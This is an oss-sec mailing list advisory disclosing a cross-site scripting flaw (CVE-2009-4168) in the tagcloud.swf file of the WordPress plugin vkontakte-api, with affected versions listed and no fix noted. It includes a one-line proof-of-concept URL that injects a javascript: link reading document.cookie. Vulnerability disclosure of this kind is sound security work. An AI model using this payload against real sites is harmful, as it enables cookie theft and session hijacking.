Home page logo
/

oss-sec logo oss-sec mailing list archives

CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability
From: Henri Salo <henri () nerv fi>
Date: Mon, 11 Mar 2013 09:44:33 +0200

Hello list members,

Plugin URL: http://wordpress.org/extend/plugins/vkontakte-api/
Affected file: tagcloud.swf 368b01e1728111f99d93ac5805d97abbb899a910
PoC: 
wp-content/plugins/vkontakte-api/swf/tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27>oss-security</a></tags>
Affected versions: 1.21, 1.22, 1.23, 1.24, 1.25, 1.26, 1.27, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.7

Currently no fix available.

--
Henri Salo

Attachment: signature.asc
Description: Digital signature


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault